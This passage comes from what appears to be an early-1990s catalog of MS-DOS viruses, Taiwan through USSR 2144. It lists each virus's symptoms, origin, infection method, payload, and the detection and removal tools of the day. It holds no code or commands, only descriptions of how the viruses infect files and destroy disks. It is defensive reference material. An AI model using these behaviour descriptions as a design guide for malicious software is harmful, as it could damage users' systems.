 Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files
 General Comments:
       The Taiwan virus was first isolated in January, 1990 in
       Taiwan, R.O.C.  This virus infects .COM files, including
       COMMAND.COM, and does not install itself into system memory.

       Each time a program infected with the Taiwan virus is executed, the
       virus will attempt to infect up to 3 .COM files.  The current
       default directory is not first infected, instead the virus will
       start its search for candidate files in the C: drive root directory.
       Once an uninfected .COM file is located, the virus infects the file
       by copying the viral code to the first 743 bytes of the file, the
       original first 743 bytes of the file is relocated to the end of the
       .COM file.  A bug exists in this virus, if the uninfected .COM file
       is less than 743 bytes in length, the resulting infected .COM file
       will always be 1,486 bytes in length.  This effect is due to the
       virus not checking to see if it read less than 743 bytes of the
       original file before infecting it.

       The Taiwan virus is destructive.  On the 8th day of any month, when
       an infected program is run the virus will perform an absolute disk
       write for 160 sectors starting at logical sector 0 on the C: and
       D: drives.  In effect, this logical write will result in the FATs
       and root directory being overwritten.

       Known variant(s) of Taiwan include:
       Taiwan-B : Apparently an earlier version of the Taiwan virus, this
                  variant will hang the system when infected files are
                  executed, but after it has infected another file using
                  the selection mechanism indicated for the Taiwan virus.


 Virus Name:  Taiwan 3
 Aliases:
 V Status:    Rare
 Discovered:  June, 1990
 Symptoms:    .COM & .EXE growth, decrease in available free memory,
              system hangs
 Origin:      Taiwan
 Eff Length:  2,900 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V64+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V71+, Scan/D, or delete infected files
 General Comments:
       The Taiwan 3 Virus was isolated in June, 1990 in Taiwan, R.O.C.  It
       was dubbed the Taiwan 3 Virus by John McAfee because it is the third
       virus from Taiwan, the other two are Taiwan and Disk Killer.  This
       virus is not related to either of these two viruses.

       The first time a program infected with the Taiwan 3 Virus is executed
       on a system, the virus will install itself memory resident in low
       system free memory.  Available free memory will decrease by 3,152
       bytes.  The virus hooks interrupt 21.

       After becoming memory resident, Taiwan 3 will infect any program
       which is executed.  .COM files will increase in length by 2,900
       bytes, .EXE files will increase by between 2,900 and 2,908 bytes.
       Overlay files may also become infected as well.

       It is unknown what the activation criteria is for this virus, or
       what it does besides spreading.

       Also see: Fu Manchu


 Virus Name:  Taiwan 4
 Aliases:     2576
 V Status:    Common
 Discovered:  October, 1990
 Symptoms:    TSR; .COM & .EXE file growth; system slowdown
 Isolated:    USA and Thailand
 Origin:      Taiwan
 Eff Length:  2,576 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions:  Clean-Up V71+, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Taiwan 4, or 2576, Virus was isolated in October, 1990.  While one
       copy of this virus was submitted by a user of Excalibur! who indicated
       that it had been received from a download of AutoCad from another BBS,
       a second copy was submitted to John McAfee from Thailand on
       approximately the same date.  This virus appears to have originated in
       Taiwan, and is based on the Taiwan 3 virus.  It is a memory resident
       infector of .COM and .EXE files, but will not infect COMMAND.COM.

       When a program infected with the Taiwan 4 Virus is executed, the virus
       will check to see if it is already memory resident.  If the virus isn't
       already in memory, the virus will install itself memory resident as a
       low system memory TSR of 2,832 bytes.  Interrupts 08 and 21 will be
       hooked by the virus.

       After the virus is resident, the virus will start to slow down the
       system gradually.  After approximately 30 minutes, it will have slowed
       the system down by approximately 30 percent.

       Any .COM or .EXE file executed with Taiwan 4 active in memory will
       become infected.  Infected programs will have their file length
       increased by 2,576 bytes for .COM files, and 2,576 - 2,590 bytes for
       .EXE files.  The virus is located at the beginning of .COM files, and
       the end of .EXE files.  The following text message can be found in all
       infected programs:

               "To Whom see this: Shit! As you can see this document,
                you may know what this program is. But I must tell you:
                DO NOT TRY to WRITE ANY ANTI-PROGRAM to THIS VIRUS.
                This is a test-program, the real dangerous code will
                implement on November. I use MASM to generate varius
                virus easily and you must use DEBUG against my virus
                hardly, this is foolish. Save your time until next month.
                OK? Your Sincerely, ABT Group., Oct 13th, 1989 at FCU."

       Another text string that can be found in all infected programs is:
       "ACAD.EXECOMMAND.COM".


 Virus Name:  The Plague
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    "Program too big to fit in memory" message;
              Programs do not execute properly; Long disk accesses;
              Message and disk overwrite
 Origin:      United States
 Eff Length:  590 Bytes
 Type Code:   ONAK - Overwriting Non-Resident .COM & .EXE Infector
 Detection Method:
 Removal Instructions:  Delete infected files
 General Comments:
       The Plague Virus was isolated in January, 1991 in the United States.
       This virus is a non-memory resident infector of .COM and .EXE files,
       including COMMAND.COM.

       When a program infected with The Plague is executed, the virus will
       attempt to infect up to three programs on the current drive, starting
       in the current directory.  Infected programs can be either .COM or
       .EXE files, and COMMAND.COM can become infected.  This virus is an
       overwriting virus.  It replaces the first 590 bytes of the program
       being infected with a copy of itself.  The file date and time in the
       disk directory are not altered.

       Programs infected with The Plague will not function properly.  For .EXE
       files, the following message will usually be displayed upon program
       execution:

               "Program too big to fit in memory"

       This message may also occur for some .COM programs, but not usually.

       The Plague activates when an infected program is executed and it can
       not find an uninfected program to infect, though there is some
       randomness to whether or not the activation will actually occur.
       When this virus activates, the following message is displayed:

               "Autopsy indicates the cause of
                death was THE PLAGUE
                Dedicated to the dudes at SHHS
                VIVE LE SHE-MAN!"

       While the message is being displayed, the disk in the current drive
       will be overwritten with garbage characters, rendering it unrecoverable.

       Programs infected with The Plague cannot be disinfected since the
       first 590 bytes of the program no longer exists.  The programs must
       be deleted and replaced with clean copies.


 Virus Name:  Tiny Family
 Aliases:     Tiny-133, Tiny-134, Tiny-138, Tiny-143, Tiny-154, Tiny-156,
              Tiny-158, Tiny-159, Tiny-160, Tiny-167, Tiny-198
 V Status:    Rare
 Discovery:   July, 1990
 Symptoms:    .COM file growth
 Origin:      Bulgaria
 Eff Length:  133 - 198 Bytes (see below)
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method: ViruScan V66+, Pro-Scan 2.01+ (larger variants only)
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Tiny Family of Viruses was received by the author in July 1990
       from Vesselin Bontchev of Bulgaria.  All the viruses in this grouping
       share the same characteristics, with the only real difference is the
       effective length of the viral code.  There were five (5) viruses
       included in the "family" as of July, 1990: Tiny-158, Tiny-159,
       Tiny-160, Tiny-167, and Tiny-198.  In October 1990, five (5)
       additional viruses in this family were received from Vesselin
       Bontchev: Tiny-134, Tiny-138, Tiny-143, Tiny-154, and Tiny-156.
       In December 1990, an eleventh member was added to this family:
       Tiny-133.

       The first time a file infected with one of the Tiny Family viruses
       is executed on a system, the virus will install itself memory resident
       at memory segment 60h.  This area of memory is normally only used by
       DOS when the system is booted, after that it is never used or
       referenced.  Interrupt 21 will be hooked by the virus.

       After the virus is memory resident, the virus will infect any .COM
       program that is executed.  Infected programs will have a file length
       increase of between 134 - 198 bytes, depending on which variant is
       present on the system.  The file's date and time in the directory will
       also have been updated to the system date and time when the infection
       occurred.

       The Tiny Family of Viruses currently does not do anything but
       replicate.

       The viruses in this "family" are not related to the Tiny Virus
       documented below.

       Known members of the Tiny Family are:
       Tiny-133 : Similar to Tiny-134, this variant's effective length is
                  133 bytes.  The bugs in Tiny-134 have been fixed, this
                  virus is an excellent replicator.  This variant has also
                  been altered so that it cannot be detected by anti-viral
                  utilities which were aware of other members of this family.
       Tiny-134 : This variant's effective length is 134 bytes.  This
                  variant is the only member of this family which is not
                  a very viable virus, it will usually hang the system
                  when it attempts to infect .COM files.
       Tiny-138 : Same as above, effective length is 138 bytes.
       Tiny-143 : Same as above, effective length is 143 bytes.
       Tiny-154 : Same as above, effective length is 154 bytes.
       Tiny-156 : Same as above, effective length is 156 bytes.
       Tiny-158 : Same as above, effective length is 158 bytes.
       Tiny-159 : Same as above, effective length is 159 bytes.
       Tiny-160 : Same as above, effective length is 160 bytes.
       Tiny-167 : Same as above, effective length is 167 bytes.
       Tiny-198 : Same as above, effective length is 198 bytes.

       Also see: Tiny Virus


 Virus Name:  Tiny Virus
 Aliases:     163 COM Virus, Tiny 163 Virus
 V Status:    Rare
 Discovery:   June, 1990
 Symptoms:    COMMAND.COM & .COM file growth
 Origin:      Denmark
 Eff Length:  163 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V64+, VirexPC, F-Prot 1.12+
 Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files
 General Comments:
       The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
       of Iceland in June 1990.  This virus is a non-resident generic
       .COM file infector, and it will infect COMMAND.COM.

       The first time a file infected with the 163 COM Virus is executed,
       the virus will attempt to infect the first .COM file in the
       current directory.  On bootable diskettes, this file will normally
       be COMMAND.COM.  After the first .COM file is infected, each time
       an infected program is executed another .COM file will attempt to
       be infected.  Files are infected only if their original length is
       greater than approximately 1K bytes.

       Infected .COM files will increase in length by 163 bytes, and have
       date/time stamps in the directory changed to the date/time the
       infection occurred.  Infected files will also always end with this
       hex string: '2A2E434F4D00'.

       This virus currently does nothing but replicate, and is the
       smallest MS-DOS virus known as of its isolation date.

       The Tiny Virus may or may not be related to the Tiny Family documented
       elsewhere in this listing.

       Also see: Tiny Family


 Virus Name:  Traceback
 Aliases:     3066
 V Status:    Extinct
 Discovered:  October, 1988
 Symptoms:    .COM & .EXE growth, TSR, graphic display 1 hour after boot
 Origin:
 Eff Length:  3,066 bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  M-3066, VirClean, F-Prot, VirexPC, Pro-Scan 1.4+,
              VirHunt 2.0+
              or delete infected files
 General Comments:
       The Traceback virus infects both .COM and .EXE files, adding
       3,066 bytes to the length of the file.  After an infected
       program is executed, it will install itself memory resident
       and infect other programs that are opened.  Additionally, if
       the system date is after December 5, 1988, it will attempt to
       infect one additional .COM or .EXE file in the current
       directory.  If an uninfected file doesn't exist in the current
       directory, it will search the entire disk, starting at the
       root directory, looking for a candidate.  This search
       process terminates if it encounters an infected file before
       finding a candidate non-infected file.

       This virus derives its name from two characteristics.  First,
       infected files contain the directory path of the file causing
       the infection within the viral code, thus is it possible
       to "trace back" the infection through a number of files.  Second,
       when it succeeds in infected another file, the virus will
       attempt to access the on-disk copy of the program that the
       copy of the virus in memory was loaded from so that it can
       update a counter in the virus.  The virus takes over disk
       error handling while trying to update the original infected
       program, so if it can't infect it, the user will be unaware
       that an error occurred.

       The primary symptom of the Traceback virus having infected
       the system is that if the system date is after December 28,
       1988, the memory resident virus will produce a screen display
       with a cascading effect similar to the Cascade/1701/1704
       virus.  The cascading display occurs one hour after system
       memory is infected.  If a keystroke is entered from the key-
       board during this display, a system lockup will occur.  After
       one minute, the display will restore itself, with the characters
       returning to their original positions.  This cascade and
       restore display are repeated by the virus at one hour
       intervals.

       Known variant(s) of the Traceback virus are:
       Traceback-B : Similar to the Traceback virus, the major differences
                     are that Traceback-B will infect COMMAND.COM and there
                     is no cascading display effect after the virus has
                     been resident for one (1) hour.  Infected files will
                     also not contain the name of the file from which the
                     virus originally became memory resident, but instead
                     the name of the current file.  A text string:
                     "MICRODIC MSG" can be found in files infected with
                     Traceback-B.  If the system is booted from a diskette
                     whose copy of COMMAND.COM is infected, attempting to
                     execute any program will result in a memory allocation
                     error and the system being halted.
                     Origin: Spain, March 1990.
       Traceback-B2: Similar to Traceback-B2, this variant has the cascading
                     display effect after the virus has been resident in
                     memory for one (1) hour.  The text string " XPO DAD     "
                     replaces the "MICRODIS MSG" text string in Traceback-B.
                     Origin: Spain, May 1990.

       Also see: Traceback II


 Virus Name:  Traceback II
 Aliases:     2930
 V Status:    Extinct
 Discovered:  October, 1988
 Symptoms:    .COM & .EXE growth, TSR, graphic display 1 hour after boot
 Origin:      
 Eff Length:  2,930 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D/X, F-Prot, VirexPC, Pro-Scan 1.4+, VirHunt 2.0+,
              or delete infected files.
 General Comments:
       The Traceback II virus is a variant of the Traceback (3066)
       virus.  It is believed that Traceback II predates the
       Traceback virus, however the Traceback virus was isolated
       and reported first.  As with the Traceback virus, the
       Traceback II virus is memory resident and infects both .COM
       & .EXE files.

       The comments indicated for the Traceback virus generally
       apply to the Traceback II virus, with the exception that the
       file length increase is 2,930 bytes instead of 3,066 bytes.

       Known variant(s) of the Traceback II Virus are:
       Traceback II-B: Similar to Traceback II, this variant will infect
                       COMMAND.COM.  When the cascading effect occurs, the
                       screen will not be restored, instead the system will
                       be hung requiring it to be powered off and rebooted.

       Also see: Traceback


 Virus Name:  Turbo 448
 Aliases:     @ Virus, Turbo @, Polish-2
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    .COM growth; File not found errors with some utilities.
 Origin:      Hungary
 Eff Length:  448 Bytes
 Type Code:   PRCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Turbo 448, or @ Virus, was discovered in Hungary in November, 1990.
       This virus is a memory resident infector of .COM files, including
       COMMAND.COM.

       The first time a program infected with the Turbo 448 Virus is executed,
       the virus will install itself memory resident at the end of the
       Command Interpretor in memory.  Total system memory and available free
       memory will not decrease.  Interrupt 21 will be hooked by the virus.

       The Turbo 448 Virus is unusual in that it does not infect programs when
       they are executed.  Instead, it infects .COM files when they are openned
       for some other reason besides execution.  For example, if the virus is
       memory resident a program A.COM is copied to B.COM, both programs will
       become infected by the virus.

       Infected files will increase in length by 448 bytes, with the virus
       being located at the end of the file.  The program's date and time in
       the disk directory will also have been updated to the system date and
       time when the file was infected.  The following text string can be
       found at the end of all infected programs:

               "Udv minden nagytudasunak! Turbo @"

       Another interesting behavior of this virus is that when the virus is
       memory resident, anti-viral products which are unaware of the Turbo 448's
       presence in memory will not function properly.  After the third file is
       read, the program may fail due to a "file not found" error being received
       when it attempts to open the fourth program.

       Also see: Turbo Kukac 9.9


 Virus Name:  Turbo Kukac
 Aliases:     Kukac, Turbo Kukac 9.9, Polish-2
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    .COM growth; Decrease in total system and free available memory;
              File not found errors with some utilities.
 Origin:      Hungary
 Eff Length:  512 Bytes
 Type Code:   PRCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Turbo Kukac, or Kukac, Virus was discovered in Hungary in November,
       1990.  This virus is a memory resident infector of .COM files, including
       COMMAND.COM.  It is very similar to the Turbo 448 Virus.

       The first time a program infected with the Turbo Kukac Virus is executed,
       the virus will install itself memory resident following the Command
       Interpretor and any previously loaded TSRs.  Total system memory and
       available free memory will decrease by 1,040 bytes.  Interrupts 05 and
       21 will be hooked by the virus.  Note that this virus does not use a low
       system memory TSR, but instead creates a sort of "hole" in memory for
       its usage.

       Like the Turbo 448 Virus, this virus does not infect program when
       they are executed.  Instead, it infects .COM files when they are openned
       for some other reason besides execution.  For example, if the virus is
       memory resident a program A.COM is copied to B.COM, both programs will
       become infected by the virus.

       Infected files will increase in length by 512 bytes with the virus being
       located at the end of the file.  The program's date and time in the
       directory will also have been updated to the system date and time when
       the file was infected.  The following text string can be found at the
       end of all infected programs:

               "Turbo Kukac 9.9      $"

       An interesting behavior of this virus is that when the virus is
       memory resident, anti-viral products which are unaware of the Turbo
       Kukac's presence in memory will not function properly.  After the
       fourth file is read, the program may fail due to a "file not found"
       error being received when it attempts to open the fifth program.

       Also see: Turbo 448


 Virus Name:  Typo Boot
 Aliases:     Mistake
 V Status:    Rare
 Discovered:  June, 1989
 Symptoms:    BSC, Resident TOM, garbled printout.
 Origin:      Israel
 Eff Length:  N/A
 Type Code:   BRt - Resident Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  MDisk, Pro-Scan 1.4+, F-Prot, or DOS SYS Command
 General Comments:
       The Typo Boot virus was first isolated in Israel by Y. Radai
       in June, 1989.  This virus is a memory resident boot sector
       infector, taking up 2K at the upper end of system memory once
       it has installed itself memory resident.

       The major symptom that will be noticed on systems infected
       with the Typo Boot virus is that certain characters in
       printouts are always replaced with other phonetically
       similar characters.  Since the virus also substitutes hebrew
       letters for other hebrew letters, the virus was most likely
       written by someone in Israel.  Digits in numbers may also
       be transposed or replaced with other numbers.  The substitutions
       impact printouts only, the screen display and data in files are
       not affected.

       The Typo Boot virus is similar structurally to the Ping Pong
       virus, and may be a variant of Ping Pong.  It can be removed
       from a disk by using MDisk, CleanUp, DOS SYS command, or
       just about any Ping Pong disinfector.


 Virus Name:  Typo COM
 Aliases:     Fumble, 867
 V Status:    Extinct
 Discovered:  November, 1989
 Symptoms:    .COM growth, Resident TOM, garbled printout (see text).
 Origin:      England
 Eff Length:  867 Bytes
 Type Code:   PRtC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  Scan/D/X, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Typo COM virus is similar to the Typo Boot virus in that
       it will garble data that is sent to the parallel port once it
       has activated.  Unlike the Boot virus, the COM virus infects
       generic .COM files.  This virus was first reported by Joe
       Hirst of Brighton, UK, in November, 1989.

       The Typo COM virus only infects .COM files on even-numbered
       days.


 Virus Name:  USSR
 Aliases:
 V Status:    Rare
 Discovered:  October, 1990
 Symptoms:    .EXE growth; hard disk boot sector and partition table damage;
              system hangs; long program load times
 Origin:      USSR
 Eff Length:  576 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected Files
 General Comments:
       The USSR Virus was discovered in October, 1990 in the USSR.  It is
       an encrypted, non-resident generic infector of .EXE files.

       Each time a program infected with the USSR Virus is executed, it will
       search the currect directory for the first uninfected .EXE file.  If
       it finds one, it will attempt to infect it.  Sometimes when the virus
       attempts to infect a file, it will hang the system leaving the drive
       light on, however most of the time the virus is successful.  Infected
       files will increase in length by 576 to 586 bytes, with the virus
       located at the end of the file.

       Systems infected with this virus may go to boot their system from its
       hard disk only to find that the hard disk's boot sector has been
       removed, and the partition table has been damaged, thus rendering the
       hard disk inaccessible.  This damage can be repaired using Norton
       Disk Doctor, or MDisk with the /P option.

       Infected systems will also experience longer than normal load times
       when infected programs are executed.  The longer than normal load time
       is due to the virus searching for a file to infect, and then infecting
       the candidate file if one was found.


 Virus Name:  USSR 311
 Aliases:     V-311
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; COMMAND.COM renamed to COMMAND.CON
 Origin:      USSR
 Eff Length:  311 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 311, or V-311, Virus was submitted in January, 1991.  It
       originated in the USSR.  This virus is a non-resident infector of .COM
       programs, including COMMAND.COM.

       When a program infected with USSR 311 is executed, the virus will check
       the system time to see if the seconds value is equal to one of 16
       values.  If it was equal to one of those 16 values, COMMAND.COM will be
       renamed to COMMAND.CON.  Whether or not the rename of COMMAND.COM
       occurred, the virus will then infect one .COM program in the current
       directory.

       Infected .COM programs will increase in length by 311 bytes, the virus
       will be located at the end of the infected file.  The file's time in
       the disk directory will also be modified to be 11:19:32, the infection
       marker for this virus.  The file date in the directory is not altered.

       USSR 3111 will also alter the file attributes for the file in the
       directory.  In particular, bits 8 thru 15 will be reset, which may
       produce unexpected results in environments that make use of these
       bits.


 Virus Name:  USSR 492
 Aliases:
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM file growth; File date/time changes
 Origin:      USSR
 Eff Length:  495 - 508 Bytes
 Type Code:   PRfCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 492 Virus was submitted in December, 1990 and is from the
       USSR.  This virus is a memory resident .COM file infector, it will
       infect COMMAND.COM.

       When the first program infected with USSR 492 is executed, the virus
       will install itself memory resident in high system memory, but below
       the 640K DOS boundary.  This memory is not reserved by the virus.
       Interrupt 21 will be hooked by the virus.  At the time of going memory
       resident, the virus will check to determine if COMMAND.COM on the C:
       drive is infected, if it isn't, then the virus will infect it.

       Once USSR 492 is memory resident, it will infect any .COM program which
       is executed.  Execution of COMMAND.COM on the A: drive is the only way
       to infect COMMAND.COM on A:.

       Programs infected with USSR 492 will have a file length increase of
       495 to 508 bytes.  The virus will be located at the end of infected
       programs.  Infected programs will also have their date and time in the
       disk directory changed to the system date and time when infection
       occurred.

       USSR 492 does not appear to do anything besides replicate.


 Virus Name:  USSR 516
 Aliases:     Leapfrog
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth
 Origin:      USSR
 Eff Length:  516 Bytes
 Type Code:   PRCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 516 Virus was submitted in December, 1990.  It is from the
       USSR.  This virus is a memory resident infector of .COM programs,
       including COMMAND.COM.  It infects on file execution.

       The first time a program infected with the USSR 516 Virus is executed,
       the virus will install itself memory resident in a "hole in memory"
       between MSDOS and the DOS Stacks.  This area will be labelled
       DOS Data.  Interrupt 21 will be hooked by the virus.  There will be
       no change in total system memory or available free memory.

       After the virus is memory resident, it will infect .COM programs which
       are executed that had an uninfected file length which was greater than
       512 bytes.  Infected .COM programs will have their length increased
       by 516 bytes, the virus will be located at the end of the program.

       USSR 516 does not appear to do anything besides replicate.  The original
       submitted sample was not a natural infection of this virus, so this may
       be a research virus.


 Virus Name:  USSR 600
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth
 Origin:      USSR
 Eff Length:  600 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 600 Virus was submitted in December, 1990, and is from the
       USSR.  This virus is a memory resident infector of .COM programs,
       including COMMAND.COM.

       When the first program infected with USSR 600 is executed, the virus
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  The DOS ChkDsk program will indicate
       that total system memory and available free memory are 2,048 bytes
       less than expected.  This virus does not move the interrupt 12
       return.  USSR 600 uses interrupts 21 and 24.

       Once USSR 600 is memory resident, it will infect .COM programs which
       are executed if they have an original file length of at least 600
       bytes.  Infected files will increase in size by 600 bytes, and the
       virus's code will be located at the beginning of the infected program.

       It is unknown if this virus does anything besides replicate.


 Virus Name:  USSR 707
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth; decrease in total system and available memory
 Origin:      USSR
 Eff Length:  707 Bytes
 Type Code:   PRtCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 707 Virus was submitted in December, 1990.  It is from the
       USSR.  This virus is a memory resident infector of .COM programs,
       including COMMAND.COM.

       When the first program infected with the USSR 707 Virus is executed,
       this virus will install itself memory resident at the top of system
       memory but below the 640K DOS boundary.  It will move the interrupt 12
       return so that the virus in memory cannot be overwritten.  USSR 707
       makes use of interrupt 21, which will now map to the virus in high
       system memory.  Total system memory and available free memory will
       be 720 bytes less than expected.

       After USSR 707 is memory resident, any .COM program executed will
       become infected by the virus.  Infected .COM programs will have a
       file length increase of 707 bytes, the virus will be located at the
       end of the file.  If COMMAND.COM is executed, it will be infected.

       It is unknown if USSR 707 does anything besides replicate.


 Virus Name:  USSR 711
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth; system hangs;
              decrease in total system and available memory
 Origin:      USSR
 Eff Length:  711 Bytes
 Type Code:   PRhC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 711 Virus was submitted in December, 1990, and comes from the
       USSR.  This virus is a memory resident infector of .COM files.  It does
       not infect COMMAND.COM.

       When the first program infected with USSR 711 is executed, the virus
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  This memory is reserved.  The virus also
       hooks interrupts 08, 13, and 21.  The DOS ChkDsk program will indicate
       that total system memory and available free memory is 704 bytes less
       than what the user expects.  The interrupt 12 return is not altered
       by this virus.

       After USSR 711 is memory resident, any .COM file which is executed that
       had an original file length of at least 1600 bytes will be infected by
       the virus.  Infected .COM files will increase in size by 705 to 717
       bytes, and the virus will be located at the end of the infected file.

       Systems infected with USSR 711 may notice occasional system hangs which
       may occur when this virus attempts to infect .COM programs.

       It is unknown if USSR 711 does anything besides replicate and
       occasionally hang the system when infecting files.


 Virus Name:  USSR 948
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; decrease in total system and available memory
 Origin:      USSR
 Eff Length:  948 Bytes
 Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 948 Virus was received in December, 1990, and originated in
       the USSR.  This virus is a memory resident infector of .COM and .EXE
       files, and will also infect COMMAND.COM.

       When the first program infected with USSR 948 is executed, this virus
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  The interrupt 12 return will not be
       altered, although the memory in use by the virus is reserved.
       Interrupts 1C and 21 will be hooked by the virus.

       After USSR 948 is memory resident, and .COM or .EXE program which is
       executed or openned for any reason will become infected by the virus.
       Infected programs, with the exception of COMMAND.COM, will increase
       in size by between 950 to 963 bytes.  In the case of COMMAND.COM, the
       virus will overwrite a portion of the stack space located in the file,
       so the file will not have a length change.  In all cases, the file
       date and times in the disk directory are not altered.  Infected
       programs will have the virus located at the end of the file.

       It is unknown if USSR 948 does anything besides replicate.


 Virus Name:  USSR 1049
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; system hangs;
              decrease in total system and available free memory
 Origin:      USSR
 Eff Length:  1,049 Bytes
 Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 1049 virus was received in December, 1990.  It originated in
       the USSR.  This virus is a memory resident infector of .COM and .EXE
       files, and does not infect COMMAND.COM.

       When the first program infected with USSR 1049 is executed, the virus
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  This memory will be 1,056 bytes in
       size and is reserved.  The interrupt 12 return is not moved. Interrupt
       21 will be hooked by the virus.

       After USSR 1049 is memory resident, the virus will infect .COM and
       .EXE files when they are executed.  The virus, however, will not infect
       very small .EXE files.  Infected files will increase in size by
       1,051 to 1,064 bytes, the virus will be located at the end of the
       infected program.

       Systems infected with the USSR 1049 Virus may experience system hangs
       when attempting to execute .EXE programs.  These hangs occassionally
       occur when the virus infects .EXE program, though the program being
       infected will actually be infected.

       It is unknown if USSR 1049 does anything besides replicate.


 Virus Name:  USSR 1689
 Aliases:     SVC V4.00
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; system hangs
 Origin:      USSR
 Eff Length:  1,689 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 1689 Virus was received in December, 1990.  It is from the
       USSR.  This virus is not a very viable virus, though it does infect
       both .COM and .EXE programs.

       When the first program infected with USSR 1689 is executed, this virus
       will install itself memory resident in the in-memory command
       interpretor.

       After the virus is memory resident, the virus will infect the next
       .COM or .EXE program executed, though a system hang will also occur.
       Infected programs will increase in size by 1,689 bytes, though on files
       larger than 1,689 bytes, the virus will hide the file length increase
       if the virus is already in memory.  Files originally smaller than 1,689
       bytes will indicate a file size increase in the DOS directory when the
       virus is resident.  In all cases, the virus will be located at the end
       of infected programs.

       With the system hang which occurs each time a program is infected by
       this virus, it is not a very viable virus, and should not be considered
       a threat in its current state.


 Virus Name:  USSR 2144
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; decrease in total system and available memory
 Origin:      USSR
 Eff Length:  2,144 Bytes
 Type Code:   PRhAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The USSR 2144 Virus was submitted in December, 1990, and is from the
       USSR.  This virus is a memory resident infector of .COM and .EXE files,
       including COMMAND.COM.

       When the first program infected with the USSR 2144 Virus is executed,
       the virus will install itself memory resident at the top of system
       memory but below the 640K DOS boundary.  The DOS ChkDsk program will
       indicate memory values that show 4,608 bytes less total system memory
       and available free memory than expected.  This virus does not move
       the interrupt 12 return.  The virus also directly alters the interrupt
       page in memory so that some interrupts will now execute the virus's
       code.

       After USSR 2144 is memory resident, and program which was originally
       greater in length than 2K that is executed or openned for reason will
       become infected by the virus. Infected .COM programs will increase in
       length by 2,144 bytes.  .EXE programs will increase in length by 2,144
       to 2,59 bytes.  In both cases, the virus will be located at the end
       of infected files.  Infected files will not have their date and time in
       the disk directory altered, and this virus does not hide the change in
       file length of infected files.

       It is unknown if USSR 2144 does anything besides replicate.


 Virus Name:  V651
 Aliases:     Eddie 3, Stealth Virus
 V Status:    Rare
